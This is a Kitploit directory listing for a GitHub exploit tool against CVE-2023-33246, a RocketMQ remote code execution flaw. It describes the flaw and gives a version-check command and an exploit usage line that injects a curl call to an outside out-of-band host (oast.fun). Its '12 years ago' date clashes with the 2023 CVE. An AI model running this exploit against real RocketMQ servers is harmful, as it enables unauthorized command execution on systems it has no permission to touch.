Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-33246_RocketMQ_RCE_EXP | Kitploit
Tools/GitHubGitHub/mkjos/cve-2023-33246_rocketmq_rce_exp
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubmkjos/cve-2023-33246_rocketmq_rce_exp

CVE-2023-33246_RocketMQ_RCE_EXP

View Repository
12 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-33246_RocketMQ_RCE_EXP

CVE-2023-33246 RocketMQ Remote Code Execution Exploit

Overview

RocketMQ versions 5.1.0 and below are vulnerable to Arbitrary Code Injection. Broker component of RocketMQ is leaked on the extranet and lack permission verification. An attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content.

Detect RocketMQ version to identify vulnerabilities

usage examples

check

root@kitploit:~
./RocketMQRceCheck -host 127.0.0.1 -port 9876

exploit

root@kitploit:~
RocketMQ_RCE_EXPLOIT 127.0.0.1 10911 curl chw9ft72vtc00002z5k0ge6rz7eyyyyyb.oast.fun/test
Download Tool